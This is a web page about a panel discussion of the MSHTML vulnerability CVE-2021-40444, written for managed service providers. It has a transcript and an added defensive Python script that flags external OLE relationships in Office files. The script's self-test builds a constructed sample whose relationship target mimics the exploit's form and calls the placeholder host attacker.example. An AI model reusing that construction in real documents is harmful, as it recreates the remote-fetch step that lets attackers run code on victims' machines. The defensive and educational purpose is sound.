Right of Boom
January 30, 2025

MSHTML Vulnerability & What it Means to Your MSP

In this video, industry experts John Hammond and Bryson Bort discuss the details and implications of CVE-2021-40444, a vulnerability in the MSHTML component of Windows. They explore how it is exploited through phishing emails and its broader impact on cybersecurity for MSPs and SMBs. The discussion also covers the importance of proactive communication and preparedness, emphasizing continuous education and vigilance to defend against evolving threats.

- The MSHTML vulnerability (CVE-2021-40444) allows remote code execution and is not limited to Microsoft Office: it affects the MSHTML component used across various applications, and is present in Windows 11.
- Cobalt Strike, a legitimate penetration-testing tool, is frequently abused by threat actors using cracked versions to gain control of compromised environments and deploy malware.
- Effective cybersecurity requires a combination of good hygiene practices, user education, and monitoring for indicators of compromise, particularly for vulnerabilities that do not yet have a patch.
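The summary above makes the point that the malicious document reaches out to a remote location when it is rendered, rather than relying on macros. The following is an added example, not code from the video or from Huntress or ConnectWise, of a triage check a defender can run on incoming attachments: it unpacks an Office Open XML package (.docx/.xlsx/.pptx), lists every relationship marked external, and flags OLE object relationships plus any non-hyperlink relationship whose target has a remote scheme. The relationship namespace and type URIs are the standard OOXML ones; the mhtml:-prefixed target used in the sample mirrors the form reported in public analyses of this CVE; the sample .docx is constructed in memory, not a real malware sample; and attacker.example is a placeholder hostname.

```python
"""Added example (not code from the video or from either speaker's employer):
inspect an Office Open XML package for relationships that make the document
fetch external content when it is rendered. Runs offline on a constructed
sample; no network access is needed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML relationship namespace and relationship type URIs.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL = REL_BASE + "oleObject"
HYPERLINK_REL = REL_BASE + "hyperlink"  # external by design; a user must click it

# Target schemes that cause content to be retrieved at render time. "mhtml" is
# the prefix reported in public analyses of CVE-2021-40444 samples; the other
# entries are a generalisation (an assumption, adjust to your environment).
REMOTE_SCHEMES = {"http", "https", "mhtml", "ftp", "file"}


def target_scheme(target: str) -> str:
    """'mhtml:http://h/x!x-usc:http://h/x' -> 'mhtml'; 'media/image1.png' -> ''."""
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):", target.strip())
    return m.group(1).lower() if m else ""


def find_external_relationships(doc_bytes: bytes) -> list:
    """Return (part, rel_type, target) for every TargetMode="External"
    relationship found in any .rels part of the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    findings.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return findings


def triage(doc_bytes: bytes) -> list:
    """Keep only the external relationships worth alerting on: any external
    OLE object, or any non-hyperlink relationship with a remote scheme."""
    hits = []
    for part, rel_type, target in find_external_relationships(doc_bytes):
        scheme = target_scheme(target)
        if rel_type == OLE_REL or (rel_type != HYPERLINK_REL and scheme in REMOTE_SCHEMES):
            hits.append({"part": part, "type": rel_type.rsplit("/", 1)[-1],
                         "scheme": scheme, "target": target})
    return hits


def build_sample_docx(ole_target: str = None) -> bytes:
    """Constructed minimal .docx (not a real sample). With ole_target set, an
    external oleObject relationship pointing at it is added, which is the
    shape of a document that 'reaches out to a remote location' on open."""
    rels = [
        f'<Relationship Id="rId1" Type="{REL_BASE}styles" Target="styles.xml"/>',
        f'<Relationship Id="rId2" Type="{HYPERLINK_REL}" Target="https://example.com/" TargetMode="External"/>',
    ]
    if ole_target:
        rels.append(f'<Relationship Id="rId3" Type="{OLE_REL}" Target="{ole_target}" TargetMode="External"/>')
    doc_rels = f'<Relationships xmlns="{REL_NS}">' + "".join(rels) + "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels",
                    f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                    f'Type="{REL_BASE}officeDocument" Target="word/document.xml"/></Relationships>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # attacker.example is a placeholder host; the target mimics the mhtml: form.
    bad = build_sample_docx("mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html")
    print("benign :", triage(build_sample_docx()))
    print("flagged:", triage(bad))
```

The check keys on the relationship shape rather than on the payload, so it also catches variants that change what the remote server serves; it does not cover RTF carriers, which the speakers note can trigger the same rendering path, so treat it as one layer alongside attachment filtering and egress controls.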

Guests

Andrew Morgan

Video Transcript

All right, we're back after a week off. Welcome, everyone. Thank you for joining us. I've got quite the guest lineup today, so I'm really excited that you guys are all with us. Starting things off, I just have a few quick announcements. Gary, this is only going to take maybe 15 or 20 minutes, so we'll get right on into it after that. Okay.

So, in the call to action, the little green icon below, the reason I'm calling out Cisco Partner Elevate: it is a two-day event starting tomorrow. The entire crew of the CyberCast is going to be involved in that event, as well as Chris La. They've got a new one; Wes and Chris are going to be doing a new incident tabletop. Wait, wait, wait. They told me when they asked me to speak that it was exclusive. They let anyone in these days, Chris. Yeah, you should know that.

Yeah, you're going to back out now. Ryan, and we have cyber resilience. And then, oh, this is really interesting. So Phyllis Lee and Jason Slagel have teamed up, I think Jason's out there, with Rachel Veno of Cisco, who has a degree in cyber, really sharp. They're doing a two-part session on CIS IG1, the top five controls, now called safeguards, for your MSP. So it's going to be a working session.

And then we may do subsequent things following that, because again, we're... I thought you were kidding that this would take 15 minutes. So the stats show that we've got to get MSPs up to speed on a framework, because 65% still haven't put in at least IG1 or an equivalent. I put a poll in. And with that, I want to introduce two guests that we've had here before. Bryson, let's start off with you. Tell us a little about yourself.

The role you play and the fun things you do on the side. I know you guys are both heavily involved in red teaming and events. So go ahead, Bryson. Sure. I'm Bryson. I am the manager of the Cyber Research Unit at ConnectWise, or the CRU. So we do research, I mean, it's right there in the name: research into intelligence, into the latest vulnerabilities. And our main purpose is to improve the threat detection in ConnectWise products.

So, primarily Perch. Pretty much everybody on my team was part of the Perch acquisition. So that's what I do in my day job. Sometimes on the weekends when I have extra time, which hasn't been much recently, I also do a live stream about hacking, CTFs, reverse engineering, that sort of thing. And then also, as part of my role at Perch, now ConnectWise, I organize CTFs that ConnectWise hosts. We've got one coming up actually in October.

We've got a bunch of stuff for Cybersecurity Awareness Month in October. So we've got a CTF; we're actually doing a two-week-long CTF with new challenges coming out every three days. So we're going to spread it out and give people time to really dig into it, instead of the mad rush in 24 hours that we normally do. We're going to give people time, so that'll be coming up in a little over a month. Yeah. Great. I think it starts a month from now. Great.

Speaking of CTFs, are you banning John, who I'm going to let introduce himself, from entering your CTF, Bryson? No. He's actually participated before. Yeah, we've had John. Oh yeah. John, thanks for coming on. Tell us a little about yourself, for those that don't know you. Thanks so much, Andrew, and thanks to everyone for letting me come hang out. Hey. Hi. Hello. My name is John Hammond. I'm a senior security researcher over at Huntress.

I work in their threat operations department, so I get to stay technical, be nerdy, be on the keyboard and hunt down hackers, look at malware and do all the fun stuff. But I also try to do a lot of other education and outreach and public stuff like this, just to get out in the community. So that's why we're hanging out. That's why I'm super happy to be here with you.

But while Huntress helps pay the bills, off on the side, as Bryson said, I like to be in the scene with other capture-the-flag and cybersecurity stuff. I have a cheesy YouTube channel, and I'm hosting another capture-the-flag in a similar vein this coming Thursday with HackerOne, one of the bug bounty or vulnerability disclosure programs. So a lot of fun stuff. I try to stay busy. Yeah, don't be so modest there, Mr.

Hammond, you almost have 300,000 subscribers. We'll put the link in about that for your thing. And then if you have yours, Bryson, I'll put that in as well. All right. Let's get right on into it. Are you sure that's not what pays the bills? Fair enough. Thanks for that, Wes. Yeah.

So, both of you guys, John and Bryson, the reason I wanted you both on is because as soon as this MSHTML vulnerability came out, the zero-day, both of you selflessly took to the communities, and I saw you both nonstop. John, you published, I know your entire executive team was away, and you published a really nicely done article that got put up on MSSP Alert. I'll put that URL in as well. Great job. Bryson,

you were posting a lot in MSPGeek, and we did a video on it as well. So, on the heels of the previous cyber call two weeks ago, we had Darren Roberts on from Black Hills, and we were talking about threat modeling, adversarial emulation. And one of the topics was Cobalt Strike. Now, Cobalt Strike, John, you'll talk a little about that.

I know, coming up here, that it's not used ubiquitously in this attack, but this is an off-the-shelf solution that just seems to be a threat actor favorite these days. So I really wanted to dig into this and get everybody, the MSPs, up to speed on where things are with this, because Microsoft has known for a little while about this vulnerability. And I want our community to know what to do and how to best defend themselves in this.

So with that, Wes, let's get everybody on the same page. Both you and Ryan are going to kind of level-set on the technical side, so people aren't necessarily lost. Some people out there are highly technical and know all about this; some don't. So let's start off with you, Wes. Yeah, right on. So I've got a series of questions, but let's start with this one. And Bryson, I'll let you kick us off. And then, John, add anything in that you would like as well.

As Andrew said, let's make sure we level-set. Talk to us about what MSHTML is used for, like its legitimate use cases. And then let's talk a little bit more about how the latest news around this vulnerability is working. Okay. So the vulnerability we're talking about, it's CVE-2021-40444, and it's a remote code execution in MSHTML. So MSHTML specifically is usually referencing the file mshtml.dll.

And that is a library that comes with Windows that renders HTML. So if you're using Internet Explorer, this is actually the library that's generating that, taking that raw HTML text and turning it into a document that you can view inside of Internet Explorer. However, it's not just used in Internet Explorer; it's a DLL that other applications can use. It's been in things like Steam.

So if you're a gamer and you've used Steam, they've updated it, so it's not in there anymore, but it used to use this MSHTML. Skype, Office. So whenever you're viewing HTML and actually rendering that inside of Office documents, it's using this MSHTML. So the vulnerability is not specifically in Office.

And I think that's where some of the initial confusion came from: we thought, oh, it's another Office vulnerability. And yes, it is, but it's not just Office. It's this underlying component that's in Windows, and even in Windows 11. So Windows 11 doesn't include Internet Explorer, but it does include MSHTML, so it also has the same vulnerability. So it's a little bit broader than what we originally thought when this first advisory came out. Awesome.

John, anything else you want to add to that? Yeah, I'll spin off that just a little bit, because Bryson did a great job setting the stage. There's an easy initial thought that, oh, this is just a Microsoft Office thing, where you see a .docx file and you think of a phishing campaign. So you think of malware that might come in the form of a macro, which we often hear about: macro-enabled phishing attacks and stuff like that.

I think it needs to be very clear that with CVE-2021-40444, and I like to just add a bunch of other fours at the end because it sounds funny, this doesn't require any macros. The reason, as Bryson was alluding to, is there's a little bit more danger in this: it's not strictly a .docx file, it's not strictly a .pptx file. It could very well be something in the Rich Text Format.

And if something were to simply render that and try to display it, it might reach out to grab external images, or it might try to load something from a remote location. That's where this really starts to kick off, because what if that remote location were serving something more malicious?

That's why we've seen some of those scary proof-of-concepts and videos out online where, if you open the file in your file browser, if you see it in there with preview mode enabled, it'll try and display the page, and it'll kickstart the payload and do some of those dangerous things. So I think this has been very spooky and very scary, because we haven't seen a patch or anything to help mitigate or remediate this. Okay.

So that, John, brings up something. As I'm doing some reading and really trying to dive in and understand what's happening here, it does seem to me like a lot of classic cybersecurity hygiene should come into play with all of this, right? Things like the principle of least privilege are helpful.

A lot of the articles I've read say, hey, if you have users with administrative privilege, those typically are going to be the ones that have the biggest vulnerability point, which, for MSPs on the call, typically that's you guys. So you need to be aware that you're probably the number one threat vector that's there.

But I also think making sure that Protected View in Outlook is enabled, which is there by default on purpose, and making sure we haven't turned that off for ease of use. Maybe a user complained about it and we flipped it off; those are things that are going to cause you pain down the road. But talk to us a little bit more, John, about the classic defenses that you should have in place that really will help mitigate this from the get-go.

Because to me it does seem like a lot of this is classic security hygiene that needs to be in place. I agree. As you mentioned, making sure Protected View is enabled, so if you were to open a document, it won't kickstart any macros or any other malicious payloads.

Obviously, whatever you can do for filtering and monitoring egress traffic. Things might be coming in an email, in that phishing example; let's try to block other unknown senders that might have some attachment that we really just don't need to see. If you get into the buzzwords of zero trust and other artificial intelligence, machine learning stuff, those are all great and fine and dandy.

I think it really does boil down to a lot of your own individual awareness and know-how. We don't really trust any strange document or RTF file that could be from an unknown location, from an untrusted location. It really sucks to boil down to this conversation where we just say, oh, remain vigilant without a patch. Maybe that's the best we can do. Yeah, indeed. So Bryson, I want to talk about ActiveX for just a minute, right?

Because that's sort of embedded in the core of all of this. I guess maybe two questions, and John, you can jump in on this one too. Do we even need ActiveX anymore? Why are we still talking about this? How is ActiveX legitimately used, and how have you also seen malware target ActiveX, à la MSHTML? Well, do we need it?

It's one of those things that a lot of organizations out there need for legacy applications that they've got running. Yeah, we should probably get rid of it like we did with Flash. It's definitely something that, I mean, it's letting you run code in your browser; that's just always a rich target for exploitation. And it has been throughout its history, which is why it's been weeded out.

I mean, Internet Explorer is pretty much the only web browser that even supports it. But that also means that if you want to use ActiveX, if you've got those legacy applications, you have to use this MSHTML library. It's not something you just switch to Chrome or something like that to work around, because MSHTML is really the only thing that will even support or do ActiveX. So yeah, it's still there. Now,

if you don't have any of those legacy applications, then no, you don't need it. And really, you shouldn't be writing new stuff for it anymore. There are better ways to do things. Was there any second part to that question? Well, yeah, maybe just how we've seen ActiveX being utilized in the wild before. Okay. As an attack surface.

Well, for this particular attack, I mean, it's remote, it's running code in your browser, so remote code execution is kind of where the main thing is with ActiveX. In this case it's just letting you download a file and then execute it. And that's really what it boils down to. And then it just comes down to what is that file going to be? Is it malware? Is it Cobalt Strike?

Is it some sort of bot? It could be anything. So it just lets you download code and execute it. Got it. John, anything else you want to add to that?

I think so. When you ask, hey, have we seen ActiveX or this sort of technique in other attacks or other incidents: I think oftentimes, when we look at how cybercriminals get in and how they maintain access and what they do for their exploitation, you talk about living off the land. Hey, you don't want to bring all of your tools to the toolkit. If you're going to attack some other external thing, you're like a tourist on a new island.

You try the native food. You look at the sights out there. When you live off the land, you use a lot of the utilities that are already on that target computer. And when you're working in Windows, if your Windows operating system is your victim, there are a lot of things that have that backwards compatibility that Bryson was alluding to. Especially when you look at that old Internet Explorer and how it's so deeply ingrained into Microsoft and Windows.

It had all that functionality to run Visual Basic script code, or do JScript, kind of its own dialect of JavaScript, and all of those things, right? They could very well be used in an HTA file. We often hear about that with the old MSHTA program.

And I don't mean to get all that technical and nerdy, sorry, but all of those things are potentially an option for being able to create a new ActiveX object or use some of the WScript.Shell and internal Windows stuff that could very well be powerful and damaging depending on how it's used. So I think this ActiveX incident on its own is another fine example of that.

So you're stumbling wisely into my last question for you, John. If you look at the cyber kill chain, right, we've seen weaponization and delivery primarily over Office documents via email, but you kind of hinted that it's possible, whether it's this vulnerability or... I'm asking you to put on your prediction hat a little bit with me.

Do you see this sort of evolving or changing in such a way that we may see other attack delivery methods that aren't just primarily Office documents via attachments sent to a user? Oh, there's a lot to unpack there. Sorry. Yeah. I might miss your question, if you can help steer me toward it. Sure.

Again, I think there are a lot of tricks and techniques packed into this vulnerability and this CVE, because of the exploit that we've seen in the wild, the known attacks that have been ongoing. And I think Microsoft, I think folks have even said, hey, this has been going on for a month now, and now we're just starting to talk about this. I think it opens the door for initial access in that phishing scenario that we're discussing.

And that means that the bad individuals, the cybercriminals, have code execution. So what they do next is totally up to them. Do they want to load up Cobalt Strike and do their own post-exploitation? Do they want to try and exfiltrate data? What user privileges are they running as? Are they an admin user right off the bat? Can they do some lateral movement, go compromise the whole domain, et cetera, et cetera? I think this vulnerability opens the door for much more damage,

because it will give you that initial access and code execution. Okay. With that said, have I completely butchered your question? Well, I think I understand where I missed on asking, but that was actually really very interesting and super helpful to me. On the post side, I know Ryan's going to ask some more post-exploitation questions too, to jump more into what you just mentioned.

But let's take other things that theoretically render MSHTML, non-Outlook stuff, like Skype and some other Microsoft platforms. I don't know if Teams does, and others, but do you foresee other attack vectors that may go after other platforms that could render and use MSHTML? Does that make sense? Yes. Sorry.

And I think the clear answer is yes. If you boil down to the technical details, and I don't mean to, I feel like there are three other stages of what CVE-2021-40444 pulls off and does; that MSHTML portion could do something else. I don't think we've dug into the analysis on that, dug into all the research yet.

But right now, from what we've seen, it's like kickstarting a DLL or a CAB file. I think with a little bit more ingenuity, with a little bit more creativity from threat actors, it could very well do something different. Bryson, what do you think? Am I driving in the wrong direction there? No, I think you're right. It seems like almost every day last week there was a new way of exploiting this.

Originally it was just, hey, be careful with your Word docs, enable Protected Mode and you should be good. And then we start finding, well, no, your PowerPoint and Excel too. And there are ways to bypass Protected Mode. Oh, hey, look, an RTF file in preview mode in Windows Explorer will trigger it as well.

And just, yeah, this underlying component, this MSHTML, is used in a number of other places, and potentially anywhere it is used could be exploited. So, Skype potentially; maybe preview mode in Outlook. I've seen some people hint at that as a possibility, though I haven't seen any definite proof of that. So there are definitely, I think, more ways this could be exploited that we've yet to learn about.

We'll see what happens. Yeah. Fantastic. So, yeah, John and Bryson, thank you for answering some of my questions individually. That really helps me and hopefully helps the group. So, Ryan, I'll turn it over to you, my friend. Yeah, so we're going to get a little more into how this is actually being leveraged. I think you set that up pretty well.

It seems like if you do a Google search of threat actor plus CVE-2021-40444, or ransomware plus MSHTML, the only thing that's really coming up is that this could lead to Cobalt Strike. And Cobalt Strike isn't a threat actor; it's actually a valid piece of software, if you Google it. It's a thing people actually use to do penetration tests.

And we've talked about Cobalt Strike several times in the recent past, once associated with TA551, Shathak, the email-based threat actor group. So talk to us a little bit more about Cobalt Strike and why it's really so important for MSPs and SMBs to be able to detect Cobalt Strike Beacons, and really what it means for them if a threat actor has implanted Cobalt Strike in their environment. Bryson, you want to get 'em all rolling, I'm sure. Yeah.

So the reason why Cobalt Strike keeps coming up is because the samples that have been coming out, the ones that we've seen and we've been evaluating, were deploying a Cobalt Strike payload. Originally, Microsoft's advisory just said that the attack had been witnessed in the wild, and that's really all they said.

There wasn't a lot of detail provided. Then samples started coming out, and as we looked at the samples, Cobalt Strike was the payload. Now, yes, Cobalt Strike is valid software; it's red team, adversary emulation software. It's great stuff. They're not doing anything bad. They're not bad people. It's just that there have been cracked versions of it that have been leaked.

And because it's really good at what it does, attackers have picked up on that and done their own thing. And there was actually even, like this morning, this Vermilion Strike, which is a new one; basically some of the bad guys just kind of replicated what Cobalt Strike does and made their own payload that runs in Linux. I haven't read a lot about it.

I'm summarizing, but at any rate, yeah, it lets the bad guys just do what they want to do on your system. It gives them a foothold, lets them then execute whatever other payload they want, whether it's a coin miner or ransomware, or just stealing your data. It just gets them in there and lets them do their own thing. And yes, it's valid, but it's been cracked, and it's being used by the bad guys too. Okay. Yeah.

So I'll reiterate what we said the last time we talked about Cobalt Strike. If you get alerted by your MDR, SIEM, Huntress, partners, that you have a Cobalt Strike instance in your environment, that is not an "eh, I'll fix it this afternoon." That's an "I'm dropping everything and I'm fixing this right now." Okay. Cobalt Strike is a very generic indicator. It doesn't necessarily tell you the threat actor; it just tells you you're very far along in the attack chain.

Effectively, the attacker has their toolset in your environment now, which makes them very dangerous. So I guess, yeah, I'll hand it over to you, Gary, and then I'll circle back. I don't mean to interject, gentlemen. I suddenly got pulled for some little household emergency. If you're still kicking around when I get back, I'd love to tune back in to you, but I'm super sorry, duty calls. I'm good. Hopefully everything's okay. Thanks, your honor. Okay.

So, John, well, Bryson, I guess it's me and you, man. I guess so, yeah. So the first question I have as I'm listening is timing. You mentioned that this could go back as far as a month. Normally with something like this, which is pretty broad, right, given the number of people that use Microsoft products, how long are these things out? And then walk us through the chronology of what happened so we can understand.

Well, these kinds of vulnerabilities that can be exploited through Office documents get used all the time. And even after they've been patched or we've known about them for years, they're still very commonly used. There's an Excel vulnerability from, I think, 2017 that's still the most commonly exploited one in phishing emails.

Once these things come out, they just keep being used over and over again because they're very effective. And it's really easy to bypass that security, because people will click the enable link: enable macros, enable editing, even though we keep telling them not to; they keep doing it. As far as the timeline for this particular vulnerability, Tuesday is when we first learned about it.

That's when Microsoft released their advisory, last Tuesday, the seventh. It was about a month ago, I think, when it was first exploited. We've started now doing some retro hunting. Now that we have a little bit of an idea of what's going on, we can look back, particularly in tools like VirusTotal where people are uploading files. Files may show up clean when they first get uploaded to VirusTotal,

but there are tools; if you've got the enterprise version, you can enable some YARA signatures that will do retroactive hunting and look back through the files. And so we're finding file samples going back to early August. There were a number of researchers who first found this, I think some guys from Mandiant, I believe; they'd known about it for maybe a week or so before the rest of us did.

They discovered it, and then it was discovered it was being used in the wild, and that's when the advisory came out. So when Microsoft first announced it on the seventh, it was just Word; it was an ActiveX control in Word that was being exploited. And then by the eighth, we started seeing a lot of chatter on Twitter. Kevin Beaumont in particular was doing a lot of research into this.

If you follow him on Twitter, he was talking about some new ways of doing it. He talked about ways to bypass the fixes that Microsoft was recommending. And then some other people were talking about how you can use RTF and Windows preview. So really, by the ninth, we had a pretty good understanding that this was much more than the initial Microsoft advisory warned us about. Now, that being said, we don't know a lot about the initial campaign.

So we know it was being used. We don't exactly know who was being targeted. Based on Microsoft's advisory, it was a targeted attack. And we haven't really seen it being exploited a lot, at least last week. Now, over this weekend, well, throughout the week last week, there were a number of documents found and examples, and from that, some people started writing POCs. Now, they were being careful.

You've got to be careful with this kind of thing because it's still vulnerable; there's not a patch for it yet. So most of the things that are coming out are about researchers doing their own research rather than new attack vectors that we've seen being used. So they haven't been releasing a lot of source code, but at this point, there's enough information known that there is some source code out there.

There are some POCs; there are even tools for building these malicious documents. And in particular, some of the hacker forums picked up on that over the weekend. So now you can get the tools to generate these documents. So I expect this week we're going to start seeing a lot more active exploitation than what we did last week. Yeah.

You know, this just goes to what we've been talking about. We've been working really hard here, and for me with my TruMethods members, just kind of drilling in this conversation with prospects and customers around an assumed-breach mentality. And I think this goes a long way into understanding the timeline and what's happening, what you just explained. Everyone is vulnerable to some degree, right, one way or another. So I had two other questions.

One, how and what do you think an MSP should or shouldn't be communicating to their customer base when something like this comes up? So again, the most common method of exploitation right now is through phishing emails. You would get the email, you'd have to open it, and you actually have to specifically allow it, click on that enable editing, in order for the ActiveX control to work.

Now again, there have been workarounds and other potential ways of doing this that have been discussed and explored, but that's still the most common method that we've actually seen. So just user education: let them know that, hey, this is happening right now. If you can, come up with some examples. So there are a few examples. The most common one that I've seen, in the samples that I've seen, and that's also been in the news,

was like a letter from a lawyer. So tell your users about it, warn them about how it's exploited, that you have to open the file and click on enable editing; tell them not to do those things. Just delete it if you're not expecting it. User education, I think, will go a long way. Now, that being said, again, there have been other ways that have been discussed and explored as far as how this can be exploited.

Uh, but it still comes down to you've gotta get a file into, into a system at some way. Uh, so that's over email is gonna be the most common method for, for that happening. You know, like, so we saw the poll, right? 67% of people hadn't, you know, communicated. And so I'm thinking number one, that's something to think about. Like a, in this case, you probably can tell people, be extra vigilant your customers, this is what's going on.

It shows your customers that you're on top of things, and maybe it prevents that one click for one customer that might have happened. But the other part of it is these are the kinds of things that we need to be circling back on.

From a vCIO standpoint, with our decision makers, and say, look, let me give you another example of what's happening here. Here are the things we put in place to try to protect you, but there are also things that are gonna happen through the biggest players in the world, like Microsoft, that we can't always protect against. And no one else can tell you that. And it leads to the other things that they might not be investing in.

So, Gary, yeah, before you ask your final question, I do have a question for, now that John's back, John. We're talking about, Bryson just mentioned phishing being probably the most prevalent way in which this is gonna be exploited. For an MSP, my head's thinking: do MSPs want to be more vigilant, for example, right now in terms of emails coming in from their distributors, like, hey, here's your Pax8 or your Ingram invoice?

Because again, if you're a threat actor, and Ryan mentioned TA551, so I'd love your comments on this too, Ryan, that's something that you'd wanna send, maybe to whoever you look up on LinkedIn who's the admin of that company. So then you could go laterally and potentially get to the RMM. Is that something that MSPs should be on a little bit more heightened alert for right now? Is that to me? Sorry. Yeah, either one.

Bryson, you, or you, John. If you need a minute, John, that's fine. Bryson? No, no, no. So I've had this thought, and I don't know if it was already discussed, forgive me, but I've tried to pose this to a couple of other individuals in the community. It's a spooky thing. I don't mean to be all doom and gloom. I don't mean to be all FUD.

But I think in the last couple of months, in the recent slew of vulnerabilities that we've seen just this year, there has been a completely new and redefined attack chain to absolute complete compromise of a network and organization. Let's say we took this CVE-2021-40444 MSHTML thing for initial access in phishing; you immediately get remote code execution. And then what if we took PrintNightmare for privilege escalation, right?

Some of the recent things with the Print Spooler issue: cool, we have local administrator. If I'm acting as the adversary, then maybe we do just that as well for some lateral movement. And what if we can get a domain user in an Active Directory environment? And then PetitPotam was a very hot topic in conversation, being able to compromise the domain.

I think this CVE opens the door, with staging of all of those other things we saw in the past few months, to a complete takeover. Obviously we live in a world where organizations are still getting popped because they're using eight-character passwords or something cheesy, something silly. But now, if you are hardened, if you are secure with your password policy, with your use of 2FA, et cetera, I think we've got a little bit of work to do.

Because we're seeing these new issues and these new flaws that we don't see patches for, that we haven't seen addressed, where we haven't seen the mitigations and workarounds being all that effective. It's, oh dang, have we dropped the ball? Because this CVE opens the door for an absolute potential full weaponization of everything else that just came through the door.

Okay, on that thread, one of the things that I think is really dangerous about this one is that the sign of an exploit is primarily the presence of another piece of malicious software. So a lot of people, when a patch comes out, will hopefully apply the patch, but once the patch comes out, that doesn't necessarily mean that the attacker hasn't maintained a persistent foothold in your environment from the time when you were vulnerable.

And so we might not be seeing a lot of exploitation of this even in the next month or so, because for attackers it's just a land grab right now. They're trying to get footholds in as many environments as they can, see which ones they can persist in, and then take their time to go through and ransom them later. So don't just think the patch is gonna be the thing that saves you here.

You need to go back and make sure that all of these kinds of secondary infections are not there, and that these persistence footholds are not present, because that's ultimately gonna be the way that you get yourself into a bad couple of weeks. Yeah. You know, Andrew, I was just gonna say, I very much agree with that.

And Hafnium is an example of that too, where you saw foothold after foothold with these web shells being spun up. And you also look at how cybercrime typically operates now, right? It's not like one guy that does everything. Now you have access brokers that literally buy; they literally have a market they've built where they sell access that they've been granted. They don't wanna do anything else.

They'd rather just pop something, get persistence, and then sell it to the highest bidder. So you're exactly right. Those things become really, really important for you to understand. It's not just about "I apply the patch and I'm immune." The really capable ransomware affiliate groups, so not the threat actor themselves but the affiliate groups, hire roles called pen testers. And a pen tester's role is to gain initial access to a victim.

So there's literally someone in most of the really effective affiliate groups whose only job is to accumulate footholds into as many customers as they can, right? And so this is like a gift from the gods to one of those pen testers. They're like, oh, you just made my job easy. I'll just go rent some time on TA551 and shoot a bunch of docs out.

And yeah, I'll stick my feet up on my chair for the rest of the month because we're gonna have more targets than we can potentially act on. So yeah, this one's serious. If you're not taking this one seriously, this one's bad. And I don't think we're gonna see the real extent of the damage for another four to six weeks probably. Thanks for that.

Thanks, guys, for humoring me on that. Gary, sorry to... Yeah, no, I wanna take a minute and address a couple of things that came up in chat. Adam said he hasn't communicated this because they don't have a solution yet, like they don't know the scope yet until it's fully got a wrap. Adam, what I'd say is no. I mean, it's not your issue, and you're not a bad IT provider because you don't have a solution to this. That's not really what your job is.

It's much bigger than you or anyone else. So I think more communication sooner is better. Yeah. Number one, for sure. Number two, Keith asked this: if you're a small shop, it just seems like keeping up with all this, with posts and Reddits and blogs and podcasts, is just so much. And he said, hey, I'm small. Listen, it's not just you, Keith. I know people that have 10, 15 techs, and they would say the same exact thing that you're saying.

And Andrew, we don't really have a solution for that yet, right? And that's one of the reasons why we're here, to try to consolidate and bring some information. But somehow this has to move forward in some way. That's a very left-of-boom mentality, though, the idea of "I can't communicate because I don't have something that prevents it from happening yet." Remember, you have a right-of-boom answer here.

"We are actively monitoring your environment for the secondary indicators of an attack and a foothold." That's a very powerful message. Like, okay, we don't have a... It's if you're actively monitoring the environment for the secondary indicators, right? And if you're not, then yeah, you should probably worry and just be disabling all the things right now.

But to your point, Ryan, and right of boom, guys, for those of you that don't know me, is once the attack has happened. So you have your prevention, and in the middle your detection side, and we'll put something in shortly. Yeah. But I mean, Cobalt Strike beacons are not super difficult to identify. There's a lot of good information out there. Yeah.

And if that's the primary way right now, you should be focusing a lot of your energy on detecting Cobalt Strike beacons in your environment. And that's gonna give you a very good kind of story for those customers. Sorry, Andrew. So, no, no, no, I'm glad this came up, Gary.

Because one of the questions, and I think that you might have had it, but Jacob Wiley raised it in the Q&A: hey, aside from doing great hygiene or good hygiene, is there anything else we can do?

So maybe, Gary, can you kind of walk through, collectively with the team here, this right-of-boom thing? Like, again, are there things we can be doing if we had the right post-boom things in place, or even IOCs? Wes, maybe if you could talk about IOCs, indicators of compromise, what things we can do so that we're not sitting there in a post-boom scenario running for the hills at the end. Gary, thoughts? Or do you want Wes to take that?

Yeah, let Wes go first. Yeah. So I have a lot of thoughts on this. First, I understand those of you on the call that feel overwhelmed. Like, you didn't even know anything about this today, you still feel like "I'm sort of muddy on it," and then there are gonna be five more that pop up next week. I get it. Here's where your shining hope is: just like you don't try to do all your IT by yourself,

you choose and select vendors that provide services for you, that do important things for you. You need to and must be doing the same thing in the world of cybersecurity. And let me prove this and illustrate it. I'm gonna ask John and Bryson; I want both of you to answer this.

Bryson, I'll let you go first. Since we have seen this MSHTML vulnerability come up, how many people in the CRU and at ConnectWise overall have been active in this, researching it, doing regression analysis to look through it, doing additional hunting and research through all of it? Just give me a quick synopsis of what the heck you guys have done on behalf of all your partners behind the scenes. And then John, I want you to do the same.

Well, so my entire team's done at least some work on this over the past week. That's myself and three other people. We have written our own proof of concept. The first thing we did once we actually got a copy of the exploit that was being circulated is we ran it through our lab. Our lab has all of our products on it, so we were able to see: what does this look like for our customers?

What logs are generated, what kind of network artifacts? We took a pcap of that. We wrote some signatures for detection, made sure we can at least detect what happens in our lab, and got that working. And yeah, so everybody on our team kind of worked together and got that done. And we're still actively involved in other groups.

We've got lines of communication with other researchers and other companies and are keeping an eye on what they're doing as well, besides just Twitter: some private forums and Slack channels. So yeah, I'd say everybody on our team, so that's four people. We have engaged some of our security analysts; as we find tips and things that help us detect what's going on, we'll send that information to them.

And if they've got free time, they'll do some hunting as well. We've added it to some of our automated tooling; besides the regular detection capabilities we have, we have some threat hunting scripts that we run, so we've added capabilities in there as well.

